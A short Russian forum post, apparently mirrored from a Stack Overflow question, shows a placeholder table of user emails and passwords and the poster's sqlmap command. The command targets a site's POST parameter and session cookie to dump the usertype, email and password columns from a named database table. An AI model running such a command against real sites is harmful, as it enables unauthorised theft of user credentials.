Код: Выделить всё
+-------------+----------------+--------------+
| usertype | email | password |
+-------------+----------------+--------------+
| User | example@ex.com | 12345678 |
| Admin | example@ex.com | 12345678 |
| Admin | example@ex.com | 12345678 |
| User | example@ex.com | 12345678 |
| ... | | |
+-------------+----------------+--------------+
моя команда:
Код: Выделить всё
python sqlmap.py -u https://example.com --data "inject=0&data=1*" --cookie="user_session=example" -D user_data -T table_user -C usertype,email,password --dump --level 2 --risk 2
Подробнее здесь: https://stackoverflow.com/questions/610 ... -on-sqlmap
Мобильная версия